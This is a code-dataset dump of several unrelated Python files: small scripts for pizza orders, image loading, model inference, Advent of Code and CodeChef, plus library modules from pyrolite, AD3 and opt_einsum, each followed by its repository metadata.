seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
29779893290 | """
Take input N orders and output a sorted list of customers along with their orders.
Each order is a string containing "Customer - Pizza Name - Quantity" in the given format.
"""
def make_orders(ord_count, orders):
    """Read *ord_count* order lines from stdin and accumulate them into *orders*.

    Each line has the form "<customer> <pizza> <quantity>"; repeated
    customer/pizza pairs append their quantities so they can be summed later.

    Parameters:
        ord_count: number of order lines to read.
        orders: dict mapping customer name -> {pizza name: [quantities]},
            mutated in place.
    """
    for i_ord in range(1, ord_count + 1):
        parts = input(f'{i_ord}-ый заказ: ').split()
        name, pizza, num = parts[0], parts[1], int(parts[2])
        # A single chained setdefault replaces the original's redundant
        # `{pizza: []}` default and unused intermediate variable.
        orders.setdefault(name, {}).setdefault(pizza, []).append(num)
    print()  # blank line separating the prompts from the report
def dict_print(to_view):
    """Print each customer (alphabetically) with every pizza (alphabetically)
    and the total quantity ordered for that pizza."""
    for customer in sorted(to_view):
        print(f'{customer} :')
        pizzas = to_view[customer]
        for pizza in sorted(pizzas):
            total = sum(pizzas[pizza])
            print(f'\t{pizza} : {total}')
# Script entry: build the nested orders dict from stdin, then report it.
orders_history = dict()  # {customer: {pizza: [quantities]}} accumulated by make_orders
orders_count = int(input('Введите количество заказов: '))
make_orders(orders_count, orders_history)  # get and add order to dict
dict_print(orders_history)  # print of orders dictionary, sorted by customer then pizza
| AfoninSV/python_scripts | pizza_orders.py | pizza_orders.py | py | 1,002 | python | en | code | 0 | github-code | 36 |
12365029657 | import pandas as pd
import numpy as np
import pylab
from PIL import Image
from PIL import ImageOps
from conv_net.dataset import BaseDataset
from os import listdir
from os.path import isfile, join
class Dataset(BaseDataset):
    """Disk-backed image dataset for diabetic-retinopathy classification.

    Reads resized JPEG images plus CSV label files; labels are integer
    severity levels 0-4, one-hot encoded into length-5 float32 vectors.
    """

    def read_validation_set(self):
        """Return (X, y) for the validation images/labels."""
        return self._read_image_set("validation_set_resize", "validationLabels.csv")

    def read_training_set(self):
        """Return (X, y) for the training images/labels."""
        return self._read_image_set("train_set_resize", "trainLabels.csv")

    def _read_image_set(self, directory_path, label_path):
        """Load up to ``self._training_set_size`` labelled images.

        The zip with ``range(self._training_set_size)`` caps how many CSV
        rows are consumed.
        """
        labels = self._read_labels(label_path)
        X = []
        y = []
        for name, level, index in zip(labels['image'], labels['level'], range(self._training_set_size)):
            target = self._label_to_vector(level)
            path = directory_path + "/" + name + ".jpeg"
            image = self._read_image(path)
            X.append(image)
            y.append(target)
        return self._return_training_set(X, y)

    def _return_training_set(self, X, y):
        """Convert the accumulated lists into model-ready numpy arrays."""
        y = np.array(y)
        X = self._reshape_input_set(X)
        return X, y

    def _reshape_input_set(self, X):
        """Cast to float32 and, unless flattened input is requested,
        reshape to (N, 1, height, width) for the conv net."""
        X = np.array(X)
        X = X.astype(np.float32)
        if not self._flatten:
            X = X.reshape(-1, 1, self._height, self._width)
        return X

    def _label_to_vector(self, label):
        """One-hot encode an integer class label (0-4) as a float32 vector."""
        vector = np.array([0.0] * 5)
        vector[label] = 1.0
        return vector.astype(np.float32)

    def _read_labels(self, filename):
        """Read a label CSV with (at least) 'image' and 'level' columns."""
        return pd.read_csv(filename)

    def read_test_set(self, directory, test_set_size=100000):
        """Return (X, image_names) for up to ``test_set_size`` images found in ``directory``.

        ``image_names`` are the file names with the '.jpeg' suffix stripped.
        """
        files = self._list_files_in(directory)
        X = []
        image_names = []
        for image_name, index in zip(files, range(test_set_size)):
            image_path = directory + "/" + image_name
            image_name = image_name.replace(".jpeg", "")
            image = self._read_image(image_path)
            X.append(image)
            image_names.append(image_name)
        return self._reshape_input_set(X), image_names

    def _list_files_in(self, directory):
        """List plain files (not subdirectories) in ``directory``."""
        return [f for f in listdir(directory) if isfile(join(directory, f))]

    def _test_set_generator(self):
        """Yield (left_name, left, right_name, right) image pairs, skipping missing files."""
        # BUG FIX: the original used ``xrange``, which does not exist in
        # Python 3 (the rest of this file is Python 3); ``range`` is lazy too.
        for index in range(self._test_set_size):
            try:
                left_name, left, right_name, right = self._read_file_pair("test_set_resize", index)
            except IOError:
                continue
            yield left_name, left, right_name, right
| gozmo/diabetes | read_files.py | read_files.py | py | 2,480 | python | en | code | 0 | github-code | 36 |
72152970345 | import os, glob, math
import numpy as np
import tensorflow as tf
from PIL import Image
from myutils_tf import bwutils
def save_4ch_to_3ch(path_pixel_shift):
    """For every 4-channel .npy file in the folder, write a companion
    '*_3ch.npy' containing channels (0, 1, 3); files already marked
    '3ch' are left alone."""
    print(path_pixel_shift)
    pattern = os.path.join(path_pixel_shift, '*.npy')
    for source in glob.glob(pattern):
        if '3ch' in source:
            continue  # already converted
        data = np.load(source)
        target = source[:-4] + '_3ch.npy'
        np.save(target, data[:, :, (0, 1, 3)])
def get_model(model_name, model_sig):
    """Load a serialized Keras model structure and restore its latest checkpoint.

    Parameters:
        model_name: base name; the structure file is
            'model_dir/checkpoint/<model_name>_model_structure.h5'.
        model_sig: tag appended to the checkpoint folder name.

    Returns:
        The tf.keras model with the last (lexicographically greatest) .h5
        weights file loaded.
    """
    base_path = os.path.join('model_dir', 'checkpoint')
    structure_path = os.path.join(base_path, model_name + '_model_structure.h5')
    ckpt_path = os.path.join(base_path, model_name + '_' + model_sig)
    print(structure_path, '\n', ckpt_path)
    # load model structure
    model = tf.keras.models.load_model(structure_path)
    # find latest weights and load
    ckpts = glob.glob(os.path.join(ckpt_path, '*.h5'))
    # Lexicographic sort — assumes checkpoint filenames sort chronologically
    # (e.g. zero-padded epoch numbers); TODO confirm the naming scheme.
    ckpts.sort()
    ckpt = ckpts[-1]
    model.load_weights(ckpt)
    # print(ckpt)
    # model.summary()
    return model
def normalize1_and_gamma(arr, bits=16, beta=1 / 2.2):
    """Scale *arr* from [0, 2**bits - 1] down to [0, 1], then apply the
    gamma exponent *beta* (default 1/2.2). Works element-wise on arrays."""
    full_scale = 2 ** bits - 1
    normalized = arr / full_scale  # (0, 1)
    return normalized ** beta      # (0, 1)
def main():
    """Patch-wise inference: load a trained model, slide 128x128 patches
    (with 32px symmetric padding/overlap) over each test image, run the
    model on each patch and stitch the central regions back together."""
    # model name
    model_name = 'unetv2'
    model_name = 'unet'  # NOTE(review): overrides 'unetv2' above — presumably the active choice
    # model sig
    model_sig = 'noise3'
    # get model
    model = get_model(model_name, model_sig)

    # test data
    PATH_PIXELSHIFT = 'C:/Users/AI38/datasets/pixelshfit/PixelShift200_test'
    files = glob.glob(os.path.join(PATH_PIXELSHIFT, '*_3ch.npy'))

    pad_size = 32
    patch_size = 128

    # shape = np.load(files[0]).shape
    # height, width, channels = np.load(files[0]).shape
    # npatches_y, npatches_x = math.ceil(shape[0]/patch_size), math.ceil(shape[1]/patch_size)
    # print(arr_pred.shape)

    for idx, file in enumerate(files):
        arr = np.load(file)  # raw values in (0, 65535)
        # arr = arr / (2**16 -1) # (0, 1)
        # arr = arr ** (1/2.2) # (0, 1)
        arr = normalize1_and_gamma(arr)  # -> (0, 1), gamma applied
        img_arr = Image.fromarray( (arr*255).astype(np.uint8) )
        img_arr.save(os.path.join(PATH_PIXELSHIFT, f'inf_ref_%02d.png'%(idx+1)))
        print('arr.shape', arr.shape)
        # Symmetric padding so border patches have valid context.
        arr = np.pad(arr, ((pad_size, pad_size), (pad_size, pad_size),(0, 0)), 'symmetric')
        print('arr.shape', arr.shape)
        height, width, channels = arr.shape
        # Patches advance by (patch_size - 2*pad_size) so their central
        # regions tile the image without gaps.
        npatches_y = math.ceil((height+2*pad_size) / (patch_size-2*pad_size))
        npatches_x = math.ceil((width +2*pad_size) / (patch_size-2*pad_size))
        arr_pred = np.zeros_like(arr)
        print(idx, file, arr.shape, arr_pred.shape)
        # exit()
        cnt=0
        tcnt= npatches_x*npatches_y
        for idx_y in range(npatches_y):
            for idx_x in range(npatches_x):
                if(cnt%10==0):
                    print(f'{cnt} / {tcnt}')
                cnt+=1
                sy = idx_y * (patch_size-2*pad_size)
                ey = sy + patch_size
                sx = idx_x * (patch_size-2*pad_size)
                ex = sx + patch_size
                # Clamp the last row/column of patches inside the image.
                if ey >= height:
                    ey = height-1
                    sy = height-patch_size-1
                if ex >= width:
                    ex = width-1
                    sx = width-patch_size-1
                arr_patch = arr[sy:ey, sx:ex,:]
                print(np.amin(arr_patch), np.amax(arr_patch) )
                # pre-process
                # NOTE(review): normalize1_and_gamma above already applied
                # 1/2.2 gamma, so this applies it a second time — confirm intended.
                arr_patch = arr_patch**(1/2.2)
                arr_patch = (arr_patch*2) -1 # (0, 1) -> (-1, 1)
                # prediction
                pred = model.predict(arr_patch[np.newaxis,...])
                print(pred.shape)
                # post-process: keep only the central (unpadded) region of the prediction
                arr_pred[sy+pad_size:ey-pad_size, sx+pad_size:ex-pad_size, :] = \
                    (pred[0, pad_size:-pad_size, pad_size:-pad_size, :]+1)/2 # (-1, 1) -> (0, 1)
                # print(np.amin(arr_patch), np.amax(arr_patch), np.amin(arr_pred), np.amax(arr_pred))
                # exit()
        # arr_pred.astype(np.uint8)
        # Strip the padding added before patching.
        arr_pred = arr_pred[pad_size:-pad_size, pad_size:-pad_size, :]
        img_pred = Image.fromarray((arr_pred*255).astype(np.uint8))
        # name = os.path.join(PATH_PIXELSHIFT, f'inf_{model_name}_{model_sig}_%02d.png'%(idx+1))
        name = os.path.join(PATH_PIXELSHIFT, f'inf_{model_name}_{model_sig}_%02d_gamma.png'%(idx+1))
        img_pred.save(name)
        print(np.amin(img_pred), np.amax(img_pred), np.amin(arr_pred.astype(np.uint8)), np.amax(arr_pred.astype(np.uint8)))
        # NOTE(review): exit() stops after the first file — looks like leftover
        # debugging; remove to process the whole test set.
        exit()


if __name__ == '__main__':
    main()
20510618819 | # Author: Vlad Niculae <vlad@vene.ro>
# License: GNU LGPL v3
import numpy as np
from numpy.testing import assert_array_equal
from ad3 import factor_graph as fg
def test_sequence_dense():
    """Chain MAP inference with dense pairwise factors: unobserved middle
    variables should copy the state of their observed neighbours."""
    n_states = 3
    # Identity transition matrix rewards consecutive variables taking equal states.
    transition = np.eye(n_states).ravel()

    graph = fg.PFactorGraph()
    # None marks an unobserved position.
    vars_expected = [0, 1, None, None, 1]
    variables = [graph.create_multi_variable(n_states) for _ in vars_expected]
    # One dense pairwise factor per consecutive pair of variables.
    for prev, curr in zip(variables, variables[1:]):
        graph.create_factor_dense([prev, curr], transition)
    # Clamp the "observed" variables via a unary log-potential of 1.
    for var, ix in zip(variables, vars_expected):
        if ix is not None:
            var.set_log_potential(ix, 1)
    value, marginals, additionals, status = graph.solve()
    # 3 points for "observed" values, 3 points for consecutive equal vals
    assert value == 6

    expected = [0, 1, 1, 1, 1]
    obtained = np.array(marginals).reshape(5, -1).argmax(axis=1)
    assert_array_equal(expected, obtained)
| andre-martins/AD3 | python/ad3/tests/test_sequence.py | test_sequence.py | py | 929 | python | en | code | 68 | github-code | 36 |
75104144745 | from math import factorial
def count_differences(adapters):
    """AoC 2020 day 10 part 1: chain every adapter from the 0-jolt outlet and
    return (number of 1-jolt gaps) * (number of 3-jolt gaps + 1).

    The +1 accounts for the device, which is always 3 jolts above the
    highest adapter.  ``adapters`` is sorted in place (as before).
    """
    one_count, three_count = 0, 0
    current_rating = 0
    adapters.sort()
    # BUG FIX: the original iterated ``set(adapters)`` directly, whose
    # iteration order is not guaranteed to be ascending; it only worked by
    # accident of CPython's small-int hashing.  Sorting the set makes the
    # gap computation well-defined.
    for x in sorted(set(adapters)):
        gap = x - current_rating
        if gap == 1:
            one_count += 1
        elif gap == 3:
            three_count += 1
        current_rating = x
    return one_count * (three_count + 1)
def count_arrangements(adapters):
    """AoC 2020 day 10 part 2: total number of valid adapter arrangements.

    Splits the full chain into maximal runs of consecutive (gap-1) ratings;
    runs separated by 3-jolt gaps are independent, so the answer is the
    product of the per-run counts from count_combination().
    """
    adapters.sort()
    # Prepend the outlet (0) and append the device (max + 3).
    # NOTE(review): relies on list(set(...)) coming out in ascending order —
    # a CPython small-int hashing detail, not a guarantee; verify.
    complete_list = [0] + list(set(adapters)) + [adapters[-1] + 3]
    times = 1
    left, right = 0, 0
    while left < len(complete_list) - 1 and right < len(complete_list) - 1:
        # Grow the window while successive ratings differ by exactly 1.
        while complete_list[right + 1] - complete_list[right] == 1:
            right += 1
        times *= count_combination(complete_list[left:right+1])
        # Skip past the 3-jolt gap and start the next run.
        right += 1
        left = right
    return times
def count_combination(adapters):
    """Number of valid sub-arrangements for one run of consecutive ratings.

    The first and last rating of the run are fixed; any subset of the
    middle ratings may be dropped as long as no gap exceeds 3.
    """
    size = len(adapters)
    if size < 3:
        return 1
    if size == 3:
        return 2
    middle = size - 2
    # full run + (run minus one middle rating) + (run minus any pair of middles)
    return 1 + middle + int(factorial(middle) / 2)
# Script entry: one adapter rating per line in data.txt; print the part-1
# and part-2 answers.
with open("data.txt") as file:
    adapters = [int(i) for i in file.read().splitlines()]
print(count_differences(adapters))
print(count_arrangements(adapters))
4705074588 | import functools
import pandas as pd
import numpy as np
import periodictable as pt
from pathlib import Path
from tinydb import TinyDB, Query
from .transform import formula_to_elemental
from ..util.meta import pyrolite_datafolder
from ..util.database import _list_tindyb_unique_values
import logging
logging.getLogger(__name__).addHandler(logging.NullHandler())
logger = logging.getLogger(__name__)
__dbpath__ = pyrolite_datafolder(subfolder="mineral") / "mindb.json"
@functools.lru_cache(maxsize=None)  # cache outputs for speed (avoids re-reading the JSON DB)
def list_groups():
    """
    List the mineral groups present in the mineral database.

    Returns
    ----------
    :class:`list`
    """
    return _list_tindyb_unique_values("group", dbpath=__dbpath__)
@functools.lru_cache(maxsize=None)  # cache outputs for speed (avoids re-reading the JSON DB)
def list_minerals():
    """
    List the minerals present in the mineral database.

    Returns
    ----------
    :class:`list`
    """
    return _list_tindyb_unique_values("name", dbpath=__dbpath__)
@functools.lru_cache(maxsize=None)  # cache outputs for speed (avoids re-reading the JSON DB)
def list_formulae():
    """
    List the mineral formulae present in the mineral database.

    Returns
    ----------
    :class:`list`
    """
    return _list_tindyb_unique_values("formula", dbpath=__dbpath__)
def get_mineral(name="", dbpath=None):
    """
    Get a specific mineral from the database.

    Parameters
    ------------
    name : :class:`str`
        Name of the desired mineral; must be present in the database.
    dbpath : :class:`pathlib.Path`, :class:`str`
        Optional overriding of the default database path.

    Returns
    --------
    :class:`pd.Series`
    """
    db_location = __dbpath__ if dbpath is None else dbpath
    assert name in list_minerals()
    with TinyDB(str(db_location)) as db:
        record = db.get(Query().name == name)
    return pd.Series(record)
def parse_composition(composition, drop_zeros=True):
    """
    Parse a composition reference and return the composition as a
    :class:`~pandas.Series`.

    Parameters
    -----------
    composition : :class:`str` | :class:`periodictable.formulas.Formula`
        Mineral name (looked up in the database) or a chemical formula.
    drop_zeros : :class:`bool`
        Whether to drop zero-valued components from the result.

    Returns
    --------
    :class:`pandas.Series`
    """
    mnrl = None
    if composition in list_minerals():
        mnrl = get_mineral(composition)
    try:  # formulae take precedence over a database hit when both parse
        form = pt.formula(composition)
        mnrl = pd.Series(formula_to_elemental(form))
        # could also check for formulae in the database, using f.atoms
    except Exception:
        # BUG FIX: was a bare ``except:`` which also swallowed
        # KeyboardInterrupt/SystemExit; parse failure is still ignored.
        pass
    assert mnrl is not None
    if drop_zeros:
        mnrl = mnrl[mnrl != 0]
    return mnrl
def get_mineral_group(group=""):
    """
    Extract a mineral group from the database.

    Parameters
    -----------
    group : :class:`str`
        Group to extract from the mineral database.

    Returns
    ---------
    :class:`pandas.DataFrame`
        Dataframe of group members and compositions.
    """
    assert group in list_groups()
    with TinyDB(str(__dbpath__)) as db:
        grp = db.search(Query().group == group)

    df = pd.DataFrame(grp)
    # Order columns: metadata first, then chemical components.
    meta, chem = (
        ["name", "formula"],
        [i for i in df.columns if i not in ["name", "formula", "group"]],
    )
    df = df.reindex(columns=meta + chem)
    df.loc[:, chem] = df.loc[:, chem].apply(pd.to_numeric)
    df = df.loc[:, (df != 0).any(axis=0)]  # remove zero-only columns
    return df
def update_database(path=None, **kwargs):
    """
    Update the mineral composition database.

    Parameters
    -----------
    path : :class:`str` | :class:`pathlib.Path`
        The desired filepath for the JSON database.

    Notes
    ------
    This will take the 'mins.csv' file from the mineral pyrolite data folder
    and construct a document-based JSON database.
    """
    mindf = pd.read_csv(pyrolite_datafolder(subfolder="mineral") / "mins.csv")
    # Add one column per element occurring in any of the formulae.
    mindf = mindf.reindex(
        columns=mindf.columns.tolist()
        + [str(a) for a in pt.formula(" ".join(mindf.formula.to_list())).atoms]
    )
    for ix in mindf.index:  # add elemental compositions
        el = parse_composition(pt.formula(mindf.loc[ix, "formula"]))
        mindf.loc[ix, el.index] = el
    mindf = mindf.fillna(0.0)
    if path is None:
        path = __dbpath__
    path = Path(path).with_suffix(".json")
    # name group formula composition
    with TinyDB(str(path)) as db:
        # NOTE(review): purge() was removed in TinyDB 4 (renamed truncate());
        # verify against the pinned tinydb version.
        db.purge()
        for k, v in mindf.T.to_dict().items():
            db.insert(v)
        # NOTE(review): redundant inside the ``with`` block, which closes on exit.
        db.close()
| skerryvore/pyrolite | pyrolite/mineral/mindb.py | mindb.py | py | 4,362 | python | en | code | null | github-code | 36 |
26716825256 | """
Support for random optimizers, including the random-greedy path.
"""
import functools
import heapq
import math
import numbers
import time
from collections import deque
from random import choices as random_choices
from random import seed as random_seed
from typing import Any, Dict, Generator, Iterable, List, Optional, Tuple
from . import helpers, paths
from .typing import ArrayIndexType, ArrayType, PathType
__all__ = ["RandomGreedy", "random_greedy", "random_greedy_128"]
class RandomOptimizer(paths.PathOptimizer):
    """Base class for running any random path finder that benefits
    from repeated calling, possibly in a parallel fashion. Custom random
    optimizers should subclass this, and the `setup` method should be
    implemented with the following signature:

    ```python
    def setup(self, inputs, output, size_dict):
        # custom preparation here ...
        return trial_fn, trial_args
    ```

    Where `trial_fn` itself should have the signature::

    ```python
    def trial_fn(r, *trial_args):
        # custom computation of path here
        return ssa_path, cost, size
    ```

    Where `r` is the run number and could for example be used to seed a
    random number generator. See `RandomGreedy` for an example.

    **Parameters:**

    - **max_repeats** - *(int, optional)* The maximum number of repeat trials to have.
    - **max_time** - *(float, optional)* The maximum amount of time to run the algorithm for.
    - **minimize** - *({'flops', 'size'}, optional)* Whether to favour paths that minimize the total estimated flop-count or
      the size of the largest intermediate created.
    - **parallel** - *({bool, int, or executor-pool like}, optional)* Whether to parallelize the random trials, by default `False`. If
      `True`, use a `concurrent.futures.ProcessPoolExecutor` with the same
      number of processes as cores. If an integer is specified, use that many
      processes instead. Finally, you can supply a custom executor-pool which
      should have an API matching that of the python 3 standard library
      module `concurrent.futures`. Namely, a `submit` method that returns
      `Future` objects, themselves with `result` and `cancel` methods.
    - **pre_dispatch** - *(int, optional)* If running in parallel, how many jobs to pre-dispatch so as to avoid
      submitting all jobs at once. Should also be more than twice the number
      of workers to avoid under-subscription. Default: 128.

    **Attributes:**

    - **path** - *(list[tuple[int]])* The best path found so far.
    - **costs** - *(list[int])* The list of each trial's costs found so far.
    - **sizes** - *(list[int])* The list of each trial's largest intermediate size so far.
    """

    def __init__(
        self,
        max_repeats: int = 32,
        max_time: Optional[float] = None,
        minimize: str = "flops",
        parallel: bool = False,
        pre_dispatch: int = 128,
    ):
        if minimize not in ("flops", "size"):
            raise ValueError("`minimize` should be one of {'flops', 'size'}.")

        self.max_repeats = max_repeats
        self.max_time = max_time
        self.minimize = minimize
        self.better = paths.get_better_fn(minimize)
        # _parallel is set False first so the ``parallel`` property setter
        # below starts from a known state (it may create an executor).
        self._parallel = False
        self.parallel = parallel
        self.pre_dispatch = pre_dispatch

        self.costs: List[int] = []
        self.sizes: List[int] = []
        self.best: Dict[str, Any] = {"flops": float("inf"), "size": float("inf")}

        self._repeats_start = 0
        self._executor: Any
        self._futures: Any

    @property
    def path(self) -> PathType:
        """The best path found so far."""
        return paths.ssa_to_linear(self.best["ssa_path"])

    @property
    def parallel(self) -> bool:
        return self._parallel

    @parallel.setter
    def parallel(self, parallel: bool) -> None:
        # shutdown any previous executor if we are managing it
        if getattr(self, "_managing_executor", False):
            self._executor.shutdown()

        self._parallel = parallel
        self._managing_executor = False

        if parallel is False:
            self._executor = None
            return

        if parallel is True:
            from concurrent.futures import ProcessPoolExecutor

            self._executor = ProcessPoolExecutor()
            self._managing_executor = True
            return

        if isinstance(parallel, numbers.Number):
            from concurrent.futures import ProcessPoolExecutor

            self._executor = ProcessPoolExecutor(parallel)
            self._managing_executor = True
            return

        # assume a pool-executor has been supplied
        self._executor = parallel

    def _gen_results_parallel(self, repeats: Iterable[int], trial_fn: Any, args: Any) -> Generator[Any, None, None]:
        """Lazily generate results from an executor without submitting all jobs at once."""
        self._futures = deque()

        # the idea here is to submit at least ``pre_dispatch`` jobs *before* we
        # yield any results, then do both in tandem, before draining the queue
        for r in repeats:
            if len(self._futures) < self.pre_dispatch:
                self._futures.append(self._executor.submit(trial_fn, r, *args))
                continue
            yield self._futures.popleft().result()

        while self._futures:
            yield self._futures.popleft().result()

    def _cancel_futures(self) -> None:
        # Cancel any still-queued trials (e.g. after hitting max_time).
        if self._executor is not None:
            for f in self._futures:
                f.cancel()

    def setup(
        self,
        inputs: List[ArrayIndexType],
        output: ArrayIndexType,
        size_dict: Dict[str, int],
    ) -> Tuple[Any, Any]:
        # Subclasses return (trial_fn, trial_args); see the class docstring.
        raise NotImplementedError

    def __call__(
        self,
        inputs: List[ArrayIndexType],
        output: ArrayIndexType,
        size_dict: Dict[str, int],
        memory_limit: Optional[int] = None,
    ) -> PathType:
        self._check_args_against_first_call(inputs, output, size_dict)

        # start a timer?  (t0 is only read when max_time is set)
        if self.max_time is not None:
            t0 = time.time()

        trial_fn, trial_args = self.setup(inputs, output, size_dict)

        r_start = self._repeats_start + len(self.costs)
        r_stop = r_start + self.max_repeats
        repeats = range(r_start, r_stop)

        # create the trials lazily
        if self._executor is not None:
            trials = self._gen_results_parallel(repeats, trial_fn, trial_args)
        else:
            trials = (trial_fn(r, *trial_args) for r in repeats)

        # assess the trials
        for ssa_path, cost, size in trials:
            # keep track of all costs and sizes
            self.costs.append(cost)
            self.sizes.append(size)

            # check if we have found a new best
            found_new_best = self.better(cost, size, self.best["flops"], self.best["size"])

            if found_new_best:
                self.best["flops"] = cost
                self.best["size"] = size
                self.best["ssa_path"] = ssa_path

            # check if we have run out of time
            if (self.max_time is not None) and (time.time() > t0 + self.max_time):
                break

        self._cancel_futures()
        return self.path

    def __del__(self):
        # if we created the parallel pool-executor, shut it down
        if getattr(self, "_managing_executor", False):
            self._executor.shutdown()
def thermal_chooser(queue, remaining, nbranch=8, temperature=1, rel_temperature=True):
    """A contraction 'chooser' that weights possible contractions using a
    Boltzmann distribution. Explicitly, given costs `c_i` (with `c_0` the
    smallest), the relative weights, `w_i`, are computed as:

    $$w_i = exp( -(c_i - c_0) / temperature)$$

    Additionally, if `rel_temperature` is set, scale `temperature` by
    `abs(c_0)` to account for likely fluctuating cost magnitudes during the
    course of a contraction.

    **Parameters:**

    - **queue** - *(list)* The heapified list of candidate contractions.
    - **remaining** - *(dict[str, int])* Mapping of remaining inputs' indices to the ssa id.
    - **temperature** - *(float, optional)* When choosing a possible contraction, its relative probability will be
      proportional to `exp(-cost / temperature)`. Thus the larger
      `temperature` is, the further random paths will stray from the normal
      'greedy' path. Conversely, if set to zero, only paths with exactly the
      same cost as the best at each step will be explored.
    - **rel_temperature** - *(bool, optional)* Whether to normalize the `temperature` at each step to the scale of
      the best cost. This is generally beneficial as the magnitude of costs
      can vary significantly throughout a contraction.
    - **nbranch** - *(int, optional)* How many potential paths to calculate probability for and choose from at each step.

    **Returns:**

    - **cost**
    - **k1**
    - **k2**
    - **k3**
    """
    # Pop up to nbranch still-valid candidates off the cost heap.
    n = 0
    choices = []
    while queue and n < nbranch:
        cost, k1, k2, k12 = heapq.heappop(queue)
        if k1 not in remaining or k2 not in remaining:
            continue  # candidate is obsolete
        choices.append((cost, k1, k2, k12))
        n += 1

    if n == 0:
        return None
    if n == 1:
        return choices[0]

    # costs come off the heap in ascending order, so costs[0] is the minimum
    costs = [choice[0][0] for choice in choices]
    cmin = costs[0]

    # adjust by the overall scale to account for fluctuating absolute costs
    if rel_temperature:
        temperature *= max(1, abs(cmin))

    # compute relative probability for each potential contraction
    if temperature == 0.0:
        energies = [1 if c == cmin else 0 for c in costs]
    else:
        # shift by cmin for numerical reasons
        energies = [math.exp(-(c - cmin) / temperature) for c in costs]

    # randomly choose a contraction based on energies
    (chosen,) = random_choices(range(n), weights=energies)
    cost, k1, k2, k12 = choices.pop(chosen)

    # put the other choice back in the heap
    for other in choices:
        heapq.heappush(queue, other)

    return cost, k1, k2, k12
def ssa_path_compute_cost(
    ssa_path: PathType,
    inputs: List[ArrayIndexType],
    output: ArrayIndexType,
    size_dict: Dict[str, int],
) -> Tuple[int, int]:
    """Compute the flops and max size of an ssa path."""
    inputs = list(map(frozenset, inputs))  # type: ignore
    output = frozenset(output)
    remaining = set(range(len(inputs)))
    total_cost = 0
    max_size = 0

    for i, j in ssa_path:
        # Contract inputs i and j into a new intermediate k12 appended at the
        # next ssa id (len(inputs)); i and j become unavailable.
        k12, flops12 = paths.calc_k12_flops(inputs, output, remaining, i, j, size_dict)  # type: ignore
        remaining.discard(i)
        remaining.discard(j)
        remaining.add(len(inputs))
        inputs.append(k12)
        total_cost += flops12
        max_size = max(max_size, helpers.compute_size_by_dict(k12, size_dict))

    return total_cost, max_size
def _trial_greedy_ssa_path_and_cost(
    r: int,
    inputs: List[ArrayIndexType],
    output: ArrayIndexType,
    size_dict: Dict[str, int],
    choose_fn: Any,
    cost_fn: Any,
) -> Tuple[PathType, int, int]:
    """A single, repeatable, greedy trial run. **Returns:** ``ssa_path`` and cost."""
    if r == 0:
        # always start with the standard greedy approach
        choose_fn = None

    # seeding with the trial number makes each trial deterministic/repeatable
    random_seed(r)

    ssa_path = paths.ssa_greedy_optimize(inputs, output, size_dict, choose_fn, cost_fn)
    cost, size = ssa_path_compute_cost(ssa_path, inputs, output, size_dict)

    return ssa_path, cost, size
class RandomGreedy(RandomOptimizer):
    """Random-greedy path optimizer: repeated greedy trials with thermally
    randomized contraction choices (see ``thermal_chooser``).

    **Parameters:**

    - **cost_fn** - *(callable, optional)* A function that returns a heuristic 'cost' of a potential contraction
      with which to sort candidates. Should have signature
      `cost_fn(size12, size1, size2, k12, k1, k2)`.
    - **temperature** - *(float, optional)* When choosing a possible contraction, its relative probability will be
      proportional to `exp(-cost / temperature)`. Thus the larger
      `temperature` is, the further random paths will stray from the normal
      'greedy' path. Conversely, if set to zero, only paths with exactly the
      same cost as the best at each step will be explored.
    - **rel_temperature** - *(bool, optional)* Whether to normalize the ``temperature`` at each step to the scale of
      the best cost. This is generally beneficial as the magnitude of costs
      can vary significantly throughout a contraction. If False, the
      algorithm will end up branching when the absolute cost is low, but
      stick to the 'greedy' path when the cost is high - this can also be
      beneficial.
    - **nbranch** - *(int, optional)* How many potential paths to calculate probability for and choose from at each step.
    - **kwargs** - Supplied to RandomOptimizer.
    """

    def __init__(
        self,
        cost_fn: str = "memory-removed-jitter",
        temperature: float = 1.0,
        rel_temperature: bool = True,
        nbranch: int = 8,
        **kwargs: Any,
    ):
        self.cost_fn = cost_fn
        self.temperature = temperature
        self.rel_temperature = rel_temperature
        self.nbranch = nbranch
        super().__init__(**kwargs)

    @property
    def choose_fn(self) -> Any:
        """The function that chooses which contraction to take - make this a
        property so that ``temperature`` and ``nbranch`` etc. can be updated
        between runs.
        """
        if self.nbranch == 1:
            # plain greedy: no branching, so no randomized chooser needed
            return None

        return functools.partial(
            thermal_chooser,
            temperature=self.temperature,
            nbranch=self.nbranch,
            rel_temperature=self.rel_temperature,
        )

    def setup(
        self,
        inputs: List[ArrayIndexType],
        output: ArrayIndexType,
        size_dict: Dict[str, int],
    ) -> Tuple[Any, Any]:
        # Provide the per-trial function and its arguments to RandomOptimizer.
        fn = _trial_greedy_ssa_path_and_cost
        args = (inputs, output, size_dict, self.choose_fn, self.cost_fn)
        return fn, args
def random_greedy(
    inputs: List[ArrayIndexType],
    output: ArrayIndexType,
    idx_dict: Dict[str, int],
    memory_limit: Optional[int] = None,
    **optimizer_kwargs: Any,
) -> ArrayType:
    """Construct a fresh :class:`RandomGreedy` optimizer with
    ``optimizer_kwargs`` and run it once, returning the best path found."""
    optimizer = RandomGreedy(**optimizer_kwargs)
    return optimizer(inputs, output, idx_dict, memory_limit)


# Preconfigured variant that runs 128 random-greedy trials.
random_greedy_128 = functools.partial(random_greedy, max_repeats=128)
| dgasmith/opt_einsum | opt_einsum/path_random.py | path_random.py | py | 14,478 | python | en | code | 764 | github-code | 36 |
# CodeChef LAPIN: a string is a "lapindrome" when its two halves contain the
# same characters with the same frequencies; for odd lengths the middle
# character is ignored.  Comparing the sorted halves checks exactly that.
t=int(input())  # number of test cases
while(t):
    t-=1
    a=str(input())
    n=len(a)
    a=list(a)
    if(n%2==1):
        # odd length: skip the middle character
        a1=a[0:n//2]
        a2=a[n//2+1:n]
        #print(a1,a2)
    else:
        a1=a[0:n//2]
        a2=a[n//2:n]
        #print(a1,a2)
    # equal multisets of characters <=> equal sorted lists
    a1.sort()
    a2.sort()
    if(a1==a2):
        print("YES")
    else:
        print("NO")
| anirudhkannanvp/CODECHEF | Practice/LAPIN.py | LAPIN.py | py | 331 | python | en | code | 0 | github-code | 36 |
